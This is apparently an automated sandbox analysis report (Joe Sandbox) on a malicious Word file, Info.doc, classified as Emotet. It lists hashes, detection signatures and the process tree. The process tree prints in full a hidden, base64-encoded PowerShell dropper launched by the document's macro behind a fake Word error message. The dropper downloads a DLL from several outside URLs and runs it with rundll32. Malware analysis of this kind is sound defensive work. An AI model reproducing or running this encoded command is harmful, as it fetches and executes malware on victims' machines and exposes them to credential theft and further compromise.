Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Info.doc

Overview

General Information

Sample Name:Info.doc
Analysis ID:336957
MD5:37f5e7c688b8b8f664a9c8430f994f9f
SHA1:98bd3f717551017517c306bd6d429f5d410a5dcd
SHA256:ab0d8e587ebfbed00f0e6aaf7d82e4d60cb3140c983820f25192303cce71828d

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2228 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2492 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAKQArACgAJwBwACcAKwAnADoASgAnACkAKwAoACgAJwApACcAKwAnACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcASgAnACkAKQArACgAKAAnACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACkAKQArACcAdwAnACsAJwB3ACcAKwAnAHcAJwArACgAJwAuAGcAcgBlACcAKwAnAGEAJwApACsAJwB1ACcAKwAoACcAZABzACcAKwAnAHQAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAJwArACcAKAAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKABkACcAKwAnAG8AJwArACcAYwBzACcAKQApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAnACkAKQArACgAKAAnACgARgBHAG4ASgAnACsAJwApACcAKwAnACgAJwArACcAMwAnACsAJwBzADIAKQAoAEAAaAB0AHQAcAA6AEoAKQAoACcAKQApACsAJwAzACcAKwAnAHMAJwArACgAKAAnADIAKQAoACcAKwAnAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoAGsAJwArACcAbwAnACkAKQArACcAcgAnACsAKAAnAGUAYQAnACsAJwBuAGsAJwArACcAaQBkACcAKQArACgAJwBzACcAKwAnAGUAZAAnACkAKwAoACcAdQAuAGMAJwArACcAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAnAHMAMgAnACsAKAAoACcAKQAoACcAKwAnAHcAcAAtAGMAbwAnACsAJwBuACcAKQApACsAKAAnAHQAZQBuACcAKwAnAHQAJwApACsAKAAoACcASgApACcAKQApACsAKAAoACcAKAAzACcAKwAnAHMAMgApACgAJwApACkAKwAoACcAMgBjACcAKwAnAFEAJwApACsAKAAoACcAVABoAEoAJwArACcAKQAnACkAKQArACgAKAAnACgAMwAnACsAJwBzACcAKQApACsAKAAoACcAMgApACcAKwAnACgAQABoAHQAJwArACcAdAAnACsAJwBwADoASgApACgAJwArACcAMwBzADIAKQAoAEoAJwArACcAKQAnACsAJwAoACcAKQApACsAKAAnADMAcwAnACsAJwAyACcAKQArACcAKQAnACsAJwAoACcAKwAoACcAZQB4AHAAJwArACcAZQBkAGkAJwApACsAJwB0AGkAJwArACcAbwAnACsAKAAnAG4AcQAnACsAJwB1AGUAJwApACsAJwBzAHQAJwArACcALgBjACcAKwAnAG8AJwArACcAbQBKACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgAnACsAJwApACgAWABKACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoACcAKwAnAEAAaAB0AHQAcAAnACsAJwBzADoASgAnACkAKQArACcAKQAnACsAJwAoACcAKwAoACgAJwAzAHMAJwArACcAMgApACcAKwAnACgASgAnACsAJwApACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAJwApACkAKwAoACcAcwB1ACcAKwAnAHIAJwApACsAJwBpACcAKwAoACcAYQBnAHIAJwArACcAbwAnACkAKwAoACcAZgAnACsAJwByAGUAcwAnACsAJwBoAC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACgAKAAnAEoAKQAoADMAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoAHMAZQAnACsAJwByAGUAJwApACkAKwAoACgAJwB2AGUAcgBzAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoACcAKwAnAE0AJwApACkAKwAnAFYARAAnACsAJwBqACcAKwAoACgAJwBJAEoAKQAoADMAcwAyACcAKwAnACkAKAAnACsAJwBAACcAKQApACsAKAAoACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAEoAKQAoADMAJwApACkAKwAnAHMAMgAnACsAKAAoACcAKQAnACsAJwAoAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoAGcAJwArACcAZQAnACsAJwBvAGYAJwApACkAKwAoACcAZgAnACsAJwBvAGcAJwApACsAJwBsAGUAJwArACgAJwBtAHUAcwAnACsAJwBpAGMAJwArACcALgAnACkAKwAoACgAJwBjAG8AbQBKACkAJwArACcAKAAzACcAKwAnAHMAMgApACcAKwAnACgAJwArACcAdwBwAC0AYQAnACsAJwBkACcAKQApACsAKAAoACcAbQBpACcAKwAnAG4AJwArACcASgApACgAJwApACkAKwAoACgAJwAzAHMAMgApACgAeAAnACsAJwBKACkAKAAzACcAKwAnAHMAMgApACcAKwAnACgAJwApACkAKwAnAEAAJwArACgAJwBoACcAKwAnAHQAdABwACcAKQArACgAKAAnAHMAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKABKACcAKQApACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzACcAKwAnADIAKQAoACcAKQApACsAKAAnAGQAJwArACcAYQBnACcAKQArACgAJwByACcAKwAnAGEAbgBpACcAKQArACcAdAAnACsAKAAnAGUAZwBpAGEAcgBlACcAKwAnAC4AYwBvACcAKwAnAG0ASgAnACkAKwAnACkAJwArACgAJwAoADMAcwAyACcAKwAnACkAJwApACsAJwAoACcAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAJwArACcAZABtAGkAbgAnACkAKwAoACgAJwBKACcAKwAnACkAKAAnACkAKQArACcAMwAnACsAJwBzACcAKwAnADIAJwArACgAKAAnACkAJwArACcAKABqAEMASABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQApACkALgAiAFIAZQBQAGwAYQBgAEMAZQAiACgAKAAoACgAKAAnAEoAKQAoADMAJwArACcAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAUwBgAFAAbABpAFQAIgAoACQAQgBpAHkANwB2AGYAegAgACsAIAAkAFMAbABmAHIAMQBnAHAAIAArACAAJABaADcAdgB1AGwAYwB2ACkAOwAkAEQAbQBxAGkAOABwAGkAPQAoACcAUAAnACsAKAAnAGoAZAB1ACcAKwAnAGQAYwA5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABaAHAANQBrAG4AcgB5ACAAaQBuACAAJABKAGsAZAB5AHMAMABvACAAfAAgAFMAYABPAFIAdAAtAGAAbwBCAEoAYABFAGAAQwB0ACAAewBnAGAARQBUAC0AcgBgAEEAbgBgAEQATwBtAH0AKQB7AHQAcgB5AHsAJABHAGsAaABtADEAdABnAC4AIgBEAE8AdwBuAGwAbwBgAEEAYABEAGYASQBMAEUAIgAoACQAWgBwADUAawBuAHIAeQAsACAAJABKAGQAZwB6AGEANQBvACkAOwAkAFoAZABjAGoAMABjAG4APQAoACcASAAnACsAKAAnADMAJwArACcAcQAwADkAawAnACkAKwAnAHEAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEoAZABnAHoAYQA1AG8AKQAuACIATABgAGUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMAOQA4ADgANwApACAAewAmACgAJwByACcAKwAnAHUAbgAnACsAJwBkAGwAbAAzADIAJwApACAAJABKAGQAZwB6AGEANQBvACwAJwAjADEAJwAuACIAVABPAHMAYABUAGAAUgBpAG4ARwAiACgAKQA7ACQASABhAG8AMAA4ADYAeQA9ACgAJwBPAGsAJwArACcAbQBiACcAKwAoACcAZQAwACcAKwAnADgAJwApACkAOwBiAHIAZQBhAGsAOwAkAFkAdgBpAF8AbQB0AGIAPQAoACgAJwBCADAAJwArACcAZgAwACcAKQArACcAawBnACcAKwAnAG0AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAGYANABjAHQAeQBjAD0AKAAoACcASwAnACsAJwBqAG8AJwApACsAJwA0ACcAKwAoACcAYgBtACcAKwAnAGcAJwApACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2408 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2312 cmdline: POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAKQArACgAJwBwACcAKwAnADoASgAnACkAKwAoACgAJwApACcAKwAnACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcASgAnACkAKQArACgAKAAnACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACkAKQArACcAdwAnACsAJwB3ACcAKwAnAHcAJwArACgAJwAuAGcAcgBlACcAKwAnAGEAJwApACsAJwB1ACcAKwAoACcAZABzACcAKwAnAHQAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAJwArACcAKAAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKABkACcAKwAnAG8AJwArACcAYwBzACcAKQApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAnACkAKQArACgAKAAnACgARgBHAG4ASgAnACsAJwApACcAKwAnACgAJwArACcAMwAnACsAJwBzADIAKQAoAEAAaAB0AHQAcAA6AEoAKQAoACcAKQApACsAJwAzACcAKwAnAHMAJwArACgAKAAnADIAKQAoACcAKwAnAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoAGsAJwArACcAbwAnACkAKQArACcAcgAnACsAKAAnAGUAYQAnACsAJwBuAGsAJwArACcAaQBkACcAKQArACgAJwBzACcAKwAnAGUAZAAnACkAKwAoACcAdQAuAGMAJwArACcAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAnAHMAMgAnACsAKAAoACcAKQAoACcAKwAnAHcAcAAtAGMAbwAnACsAJwBuACcAKQApACsAKAAnAHQAZQBuACcAKwAnAHQAJwApACsAKAAoACcASgApACcAKQApACsAKAAoACcAKAAzACcAKwAnAHMAMgApACgAJwApACkAKwAoACcAMgBjACcAKwAnAFEAJwApACsAKAAoACcAVABoAEoAJwArACcAKQAnACkAKQArACgAKAAnACgAMwAnACsAJwBzACcAKQApACsAKAAoACcAMgApACcAKwAnACgAQABoAHQAJwArACcAdAAnACsAJwBwADoASgApACgAJwArACcAMwBzADIAKQAoAEoAJwArACcAKQAnACsAJwAoACcAKQApACsAKAAnADMAcwAnACsAJwAyACcAKQArACcAKQAnACsAJwAoACcAKwAoACcAZQB4AHAAJwArACcAZQBkAGkAJwApACsAJwB0AGkAJwArACcAbwAnACsAKAAnAG4AcQAnACsAJwB1AGUAJwApACsAJwBzAHQAJwArACcALgBjACcAKwAnAG8AJwArACcAbQBKACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgAnACsAJwApACgAWABKACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoACcAKwAnAEAAaAB0AHQAcAAnACsAJwBzADoASgAnACkAKQArACcAKQAnACsAJwAoACcAKwAoACgAJwAzAHMAJwArACcAMgApACcAKwAnACgASgAnACsAJwApACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAJwApACkAKwAoACcAcwB1ACcAKwAnAHIAJwApACsAJwBpACcAKwAoACcAYQBnAHIAJwArACcAbwAnACkAKwAoACcAZgAnACsAJwByAGUAcwAnACsAJwBoAC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACgAKAAnAEoAKQAoADMAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoAHMAZQAnACsAJwByAGUAJwApACkAKwAoACgAJwB2AGUAcgBzAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoACcAKwAnAE0AJwApACkAKwAnAFYARAAnACsAJwBqACcAKwAoACgAJwBJAEoAKQAoADMAcwAyACcAKwAnACkAKAAnACsAJwBAACcAKQApACsAKAAoACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAEoAKQAoADMAJwApACkAKwAnAHMAMgAnACsAKAAoACcAKQAnACsAJwAoAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoAGcAJwArACcAZQAnACsAJwBvAGYAJwApACkAKwAoACcAZgAnACsAJwBvAGcAJwApACsAJwBsAGUAJwArACgAJwBtAHUAcwAnACsAJwBpAGMAJwArACcALgAnACkAKwAoACgAJwBjAG8AbQBKACkAJwArACcAKAAzACcAKwAnAHMAMgApACcAKwAnACgAJwArACcAdwBwAC0AYQAnACsAJwBkACcAKQApACsAKAAoACcAbQBpACcAKwAnAG4AJwArACcASgApACgAJwApACkAKwAoACgAJwAzAHMAMgApACgAeAAnACsAJwBKACkAKAAzACcAKwAnAHMAMgApACcAKwAnACgAJwApACkAKwAnAEAAJwArACgAJwBoACcAKwAnAHQAdABwACcAKQArACgAKAAnAHMAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKABKACcAKQApACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzACcAKwAnADIAKQAoACcAKQApACsAKAAnAGQAJwArACcAYQBnACcAKQArACgAJwByACcAKwAnAGEAbgBpACcAKQArACcAdAAnACsAKAAnAGUAZwBpAGEAcgBlACcAKwAnAC4AYwBvACcAKwAnAG0ASgAnACkAKwAnACkAJwArACgAJwAoADMAcwAyACcAKwAnACkAJwApACsAJwAoACcAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAJwArACcAZABtAGkAbgAnACkAKwAoACgAJwBKACcAKwAnACkAKAAnACkAKQArACcAMwAnACsAJwBzACcAKwAnADIAJwArACgAKAAnACkAJwArACcAKABqAEMASABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQApACkALgAiAFIAZQBQAGwAYQBgAEMAZQAiACgAKAAoACgAKAAnAEoAKQAoADMAJwArACcAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAUwBgAFAAbABpAFQAIgAoACQAQgBpAHkANwB2AGYAegAgACsAIAAkAFMAbABmAHIAMQBnAHAAIAArACAAJABaADcAdgB1AGwAYwB2ACkAOwAkAEQAbQBxAGkAOABwAGkAPQAoACcAUAAnACsAKAAnAGoAZAB1ACcAKwAnAGQAYwA5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABaAHAANQBrAG4AcgB5ACAAaQBuACAAJABKAGsAZAB5AHMAMABvACAAfAAgAFMAYABPAFIAdAAtAGAAbwBCAEoAYABFAGAAQwB0ACAAewBnAGAARQBUAC0AcgBgAEEAbgBgAEQATwBtAH0AKQB7AHQAcgB5AHsAJABHAGsAaABtADEAdABnAC4AIgBEAE8AdwBuAGwAbwBgAEEAYABEAGYASQBMAEUAIgAoACQAWgBwADUAawBuAHIAeQAsACAAJABKAGQAZwB6AGEANQBvACkAOwAkAFoAZABjAGoAMABjAG4APQAoACcASAAnACsAKAAnADMAJwArACcAcQAwADkAawAnACkAKwAnAHEAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEoAZABnAHoAYQA1AG8AKQAuACIATABgAGUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMAOQA4ADgANwApACAAewAmACgAJwByACcAKwAnAHUAbgAnACsAJwBkAGwAbAAzADIAJwApACAAJABKAGQAZwB6AGEANQBvACwAJwAjADEAJwAuACIAVABPAHMAYABUAGAAUgBpAG4ARwAiACgAKQA7ACQASABhAG8AMAA4ADYAeQA9ACgAJwBPAGsAJwArACcAbQBiACcAKwAoACcAZQAwACcAKwAnADgAJwApACkAOwBiAHIAZQBhAGsAOwAkAFkAdgBpAF8AbQB0AGIAPQAoACgAJwBCADAAJwArACcAZgAwACcAKQArACcAawBnACcAKwAnAG0AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAGYANABjAHQAeQBjAD0AKAAoACcASwAnACsAJwBqAG8AJwApACsAJwA0ACcAKwAoACcAYgBtACcAKwAnAGcAJwApACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
